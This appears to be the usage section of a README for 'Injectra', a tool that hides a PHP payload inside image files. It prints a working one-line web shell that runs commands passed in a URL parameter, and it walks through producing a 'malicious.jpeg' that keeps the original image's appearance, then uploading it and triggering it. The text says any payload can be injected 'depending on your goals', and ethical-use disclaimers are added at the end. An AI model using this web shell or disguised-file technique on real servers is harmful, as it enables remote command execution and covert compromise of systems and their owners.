This section demonstrates how to use the files generated by Injectra and execute the injected payloads in a controlled environment on both Windows and Linux systems.
Injectra injects a PHP payload like:
<?php system($_GET["cmd"]); ?>To trigger the payload, access the injected file on a web server and append a query parameter, i.e:
http://localhost/malicious.jpeg?cmd=<command>Replace <command> with the desired command, such as ls or whoami.
Below is an example of how to create a malicious file using Injectra:
This is the clean file you start with. For this example, it's a simple JPEG image with no malicious code.
Run Injectra and specify the path to not_malicious.jpeg as the input file. For this proof of concept (POC), we will use the default PHP payload, though you have the option to create a custom one if needed. Save the generated output as malicious.jpeg.
python Injectra.pyFollow the prompts:
- Input File:
not_malicious.jpeg - Output File:
malicious.jpeg - Payload: (Default)
The tool generates a new file (malicious.jpeg) containing the injected payload while maintaining the appearance and functionality of the original image.
Here’s an example using your file:
- Upload
malicious.jpegto your testing server. - Access the file in your browser with a command parameter, i.e:
http://localhost/malicious.jpeg?cmd=<command> - If successful, you'll see the output of the executed command.
- Ethical Use Only: Always ensure you have proper authorization before testing any file or system.
- Testing Environment: Use a secure, isolated environment for testing to prevent accidental harm to systems.
- Default Payload: The default payload is a basic PHP command execution script, but you can inject any payload depending on your goals.
- Educational Purposes Only: Injectra is intended for educational and security research purposes. It is not to be used for malicious or unauthorized activities. Users must obtain proper authorization before testing any file or system.
Created by: AnonKryptiQuz